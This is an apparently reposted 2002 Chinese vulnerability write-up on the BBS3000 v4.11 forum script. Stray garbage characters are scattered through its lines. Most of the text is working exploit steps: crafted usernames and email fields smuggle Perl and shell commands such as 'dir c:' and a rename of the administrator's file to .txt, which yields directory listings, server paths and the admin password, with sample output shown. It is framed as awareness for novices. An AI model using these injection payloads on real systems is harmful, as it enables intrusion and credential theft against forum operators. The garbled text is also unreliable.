窥探YUZI的BBS3000社区安全性--1 0 l% `( z4 |2 c" \
文章类型:漏洞分析 文章加入时间:2002年1月24日22:24 # E9 Z0 m' H' y
--------------------------------------------------------------------------------& y" U$ P2 |8 N# ~5 B( u( ]
9 Q9 f: m k0 }) ?
窥探YUZI的BBS3000社区安全性; f8 l) X/ g0 e9 C O* n
—————————————————————————————————5 n- a+ [+ ?- H8 G( D* }
badboy-club@21cn.com
; L( k0 {/ J8 q+ { E部分漏洞提供者:, N" {( `& \$ _. J- a; U
adver& D2 B5 z" c; ]1 U, E2 V6 O% B
x.z5 z1 [+ |2 ^0 @6 x \1 Q% B
这并不是什么权威教材,只适合菜鸟了解某些免费提供的论坛程序存在的不
$ ]! ^9 s+ |* P! Y, p( s: ]安全面,切莫用此方法在国内做尝试,如果你偏要如此,那么由此引起的一
, |5 ?9 g! S. |; K& f, H切法律后果由你自己负责。
3 I0 X+ p8 |/ P- I4 }7 H$ q8 J+ G本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目6 ^; H/ M3 `: Z* N4 {. I6 C
的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人
1 g8 X0 i7 }% A" g# x6 }' r) T将保留侵权控告的权利。9 z- m: i% k& ?7 b8 Q4 k' ^% F. L
————————————————————————————————— d- {" o% a( j( {# g' p/ _
第一篇( B, u- I$ F4 K) g: e
****基本漏洞测试*****
. N w* I0 `. k0 P) W) Y5 E YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛," t( _: h( F. @3 u" j
但不少用户很少去探测这论坛的安全性,使用者很大程度上信任作者,而实际上4 `+ q/ h3 o$ r: ` F
这些免费的版本和汉化修改论坛,往往存在一些致命的漏洞,本文的目的在于揭, {' T( T, l& [$ p1 \1 \4 u
示该论坛不为人知的漏洞,让大家更好的使用这类论坛,并且保证自身资料的隐: O! W4 {! m8 B) S9 c X
蔽和服务器的安全。
) z& N+ z% L+ a2 m1 b5 x测试版本:bbs3000 v4.11
& F5 S3 M5 _0 o! D. O系统平台:win2k adv server=sp3 + iis 5.0 +ActivePerl 5.6.1.626
5 j/ R- q4 B7 p, m应用程序映射:perl.exe %s %s 动作:GET,HEAD,POST) \+ \7 V5 p$ [9 L
或者:perlIS.dll 动作:GET,HEAD,POST
( M" q1 W4 c8 \4 \% A测试情况:
Z6 K8 @0 \/ r% |( \0 q一、用户名为dir的漏洞
$ y$ V' T, o+ W4 O4 P* i1、采用应用程序映射:perl.exe %s %s应用程序映射: \4 p$ q$ Q X, j% t
在站点建立一目录(或者虚拟目录)bbs3000,按论坛作者提供的说明书,默认安% e# o% O6 r6 b) C1 _3 T! R8 E) a
装BBS3000 v4.11版本,我们注册一用户名为dir,密码为system,信箱为
, { r" i7 G* H4 o#badboy@badclub.org(#任意信箱都可以),然后我们在IE地址栏处输入:8 O) v% I; z0 D
http://192.168.0.1/bbs3000/yhzl/dir.cgi3 r/ E; _( c. x( \7 s7 T
F:\new\bbs3000\bbs3000 的目录
( e4 ?5 `8 J8 Y* L3 p5 v2 [2002-01-16 19:26 <DIR> .1 `/ a. e; ], r. \. K0 I0 E6 ^" E! @
2002-01-16 19:26 <DIR> ..
6 R7 {8 F# V$ m2002-01-16 22:42 43,247 bbs.cgi! Q) d% B2 p/ w# ]" U; S" _0 W/ U
2002-01-16 22:47 50,934 cjyh.cgi5 Z3 r. \- j& A. t
2002-01-16 22:43 38,551 bbs1.cgi
; G- ], L( f" w) a" c% |2002-01-16 22:48 6,401 cookie.cgi0 N0 k+ J) f! X& O4 d: J
2002-01-16 22:42 2,138 affiche.cgi
9 M4 E8 H( @1 Z, X3 W2002-01-16 22:43 22,434 bbs2.cgi
/ W) r/ D$ s; [5 f7 h(以下略)9 H6 x$ _1 |- U4 ?& S
34 个文件 417,611 字节& Z8 O! ?9 \+ k* z
15 个目录 1,830,944,768 可用字节3 U3 }1 t( j0 _; R# t4 [
8 Y" i$ P1 K: k3 [! {
2、采用应用程序映射:perlIS.dll应用程序映射6 a9 `6 J- Y4 ^, k6 E
得到的显示页面为:
; a. E) O/ e* @4 m1 x'F:\new\bbs3000\bbs3000\yhzl\dir.cgi' script produced no output
7 k- d" I# e6 D0 r2 [3 I* G) e测试解释:在应用程序映射中,一个扩展名只能由一个程序去映射,在采用5 Y6 ?+ G! j; t1 B2 t/ s( G
perl.exe时,BBS3000存在查看网站目录和文件的漏洞,在采用perlIS.dll时,
5 U2 s7 q& U" d0 \4 T+ P' u1 X! j则有暴露网站在服务器上的绝对地址的漏洞。8 I J" j4 T* E) S( }; Y9 x
二、用户名为system的漏洞
?& l6 Z% [& x1 T' C+ c1、采用应用程序映射:perl.exe %s %s应用程序映射
D' g' L( V S1 J* n3 Y& ?# m注册一用户名为system,密码为空格键(或者密码为system),信箱为
, S0 Y3 o/ ~/ C'dir c:'#@badclub.org,然后我们在IE地址栏内输入:
1 K/ e- n) L( w$ @http://192.168.0.1/bbs3000/yhzl/system.cgi* i" H1 { l# S1 s: T: U% h/ g5 e
返回的页面显示为:
6 v$ j2 F2 c4 T- R6 U9 AC:\ 的目录
# _: b; x1 P2 ^. w1 a. v2001-11-27 20:56 1,002 FRUNLOG.TXT
8 l6 ?% u* @0 R$ V2001-11-27 20:49 <DIR> WINNT+ j8 e& h7 p) _; [1 \
(以下略)
U/ V9 L. M* q7 ]2 W7 Q4 ]9 \ 10 个文件 29,583 字节
8 B0 R( U; K( p+ ^0 s1 e# T* U 9 个目录 946,327,552 可用字节
# a6 Y' b9 M! U2 C/ \$ @当密码为其他时,则显示:
) S% ^) \7 {( x0 ]- ~: P7 dCGI Error/ p q% R9 u* w) y+ n3 I- x# k* B
The specified CGI application misbehaved by not returning a complete; Q3 s/ z; W# Y% Z2 T9 E0 ]) ?
set of HTTP headers. The headers it did return are:
) u* D7 P$ o+ Tsyntax error at F:\new\bbs3000\bbs3000\yhzl\system.cgi line 1, near
7 b x+ m) E5 M* i "1 system"Execution of F:\new\bbs3000\bbs3000\yhzl\system.cgi 6 N* R1 a b/ ?: p$ ^" s
aborted due to compilation errors., X1 j O+ ~) n$ Z8 H( p
我们还可以这样测试用户名为system的情况,密码仍然为空格键* e$ @2 R9 ]. Q% }
(或者密码为system)但把信箱修改为@ARGV##badboy@badclub.org,然后我0 w( r5 E9 C/ x" e' L* N
们在IE地址栏内输入:
9 d( J& F' J! `7 C; ?+ x! Phttp://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:: y. O( B4 g! O7 {3 j& s
返回的页面显示
7 Y' q2 _( S% h! m, [6 vD:\ 的目录" _! y0 a8 l& k+ ^
2001-01-18 23:23 <DIR> tools
0 v, R/ m$ G5 x2001-11-27 21:18 <DIR> 98tools+ X0 [! W" N0 ]+ n5 v
2001-04-08 13:08 <DIR> W2Kreskit
: X+ G$ J. v8 a, Z2001-11-06 19:52 <DIR> NOCDKEY-PROT2 d% v: j& L4 L
2001-12-01 21:32 <DIR> WINNT. H; s/ ]/ U2 o" U( c! _5 D
2001-12-01 21:39 <DIR> Documents and Settings, R5 K5 U2 K5 b. [. D4 w3 @+ J
2001-12-01 21:41 <DIR> Program Files
% r+ T+ @4 R' y# _2001-12-01 21:53 <DIR> Inetpub. w0 A6 m. h5 x: P; L
2002-01-16 19:17 <DIR> pl
% J. S* Q5 o$ L1 d1 q(以下省略部分内容) ' \: E" _$ _! s0 A3 u
12 个文件 15,068,818 字节 r; b) E" [, H; W2 m' v( r2 M
15 个目录 2,371,317,760 可用字节$ l9 _8 p$ ^0 r
'0' 不是内部或外部命令,也不是可运行的程序+ ?; j4 K L$ b5 Z% H. X
或批处理文件。
; `) t \; d4 M8 O0 }9 Q# T2、采用应用程序映射:perlIS.dll应用程序映射
& a, P* m/ C1 L/ o用户名为system,密码为空格键(或者密码为system),信箱为'dir c:'#@badclub.org,
4 d: _, j/ g) Z然后我们在IE地址栏内输入:1 [+ X& \9 _: L2 d/ u! k
http://192.168.0.1/bbs3000/yhzl/system.cgi
4 {5 ?7 D. h9 {9 E6 y( O, s/ [. w4 D返回的页面显示为:6 p2 l, V# h5 }0 m# o) G1 d
'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output 0 h H( N6 [. t$ e7 a
把信箱修改为@ARGV##badboy@badclub.org,然后我们在IE地址栏内输入:7 D7 k" b, n3 ]9 L8 Z7 l d$ }8 ], C
http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
! k3 `. _3 P: d3 }) `4 ]) ]6 s( _! J返回的页面显示
% |! O( r4 Y# f) e7 ['F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output0 ~8 F9 `2 N" `2 s& R8 l3 `/ p
三、用户名为;字符的情况
% u) R9 d* s6 c Z2 V# G1、采用应用程序映射:perlIS.dll应用程序映射
( Z# e5 X6 D6 {8 g" K' o7 }注册一用户名为;字符,密码为1,信箱为rename "badboy.cgi","badboy.txt";#@badclub.org ,
+ Z& B$ D8 K4 l* T8 [! j(这里假设badboy为该论坛的社区区长,也就是该论坛最大权限的用户),然后我们# z/ S' E: a: h, s& l. ^, D8 c
在IE地址栏内输入:
) [/ Q+ L+ L7 m+ |# S1 Ghttp://192.168.0.1/bbs3000/yhzl/;.cgi
7 C. _5 b, N. @1 D- _' d8 y$ H, z返回的页面显示
. `7 \3 C% C% O& {'F:\new\bbs3000\bbs3000\yhzl\;.cgi' script produced no output 7 o% b# X8 C+ G% E5 o
嗯,怎么还是和上面的perl.dll例子一样啊??后面的就是关键了,你再输入这样- f( p; v. ^8 K/ {, P1 c8 v9 m
的看看4 t2 D2 |* {4 p
http://192.168.0.1/bbs3000/yhzl/badboy.txt
2 Z0 F* ^. c4 o+ Y Q返回的页面显示为
$ N2 J; s: x$ I) D' Nbadpass badboy http://192.168.0.1 2002-01-16* _" o" Q" j6 D7 s7 K) w
显示的内容前面就是密码、用户
% ^7 R' y: Y5 Y7 X5 N天啊,事情怎么那么容易呀!!~_*3 n5 l1 W: y' _
经测试,用户名为system密码为一个空格键(或者为system),信箱为
/ A' W1 O8 d r4 A$ Krename "badboy.cgi","badboy.txt";#@badclub.org 的时候,步骤和上面一样,同样
: F, ]+ @- y9 N6 S; ^ `) n& G可以获得相同的结果。
: ~, Y' R# j( z5 W2、采用应用程序映射:perl.exe %s %s应用程序映射
* j, @) N1 E. M- D; `2 e$ q6 V用户名为;字符,密码为1,信箱为rename "badboy.cgi","badboy.txt";#@badclub.org ) U& f3 U: M- X* N0 f6 `# m' ?# E
在IE地址栏内输入:
8 `/ @, z: m: B0 ~3 N% S. Lhttp://192.168.0.1/bbs3000/yhzl/;.cgi4 _- p# ^ l I
返回的页面显示
- f' y$ P! a7 J- t6 {$ t# T: A1 t, nCGI Error
4 r& f n4 [2 n5 | g+ P% d sThe specified CGI application misbehaved by not returning a complete set of HTTP * R0 T' C) b- w- _! B2 h; p
headers. The headers it did return are: ; _3 u; A I- W& {) R' U& J: ]
|
粤公网安备44152102000001号 
发表于 2002-2-4 09:43:11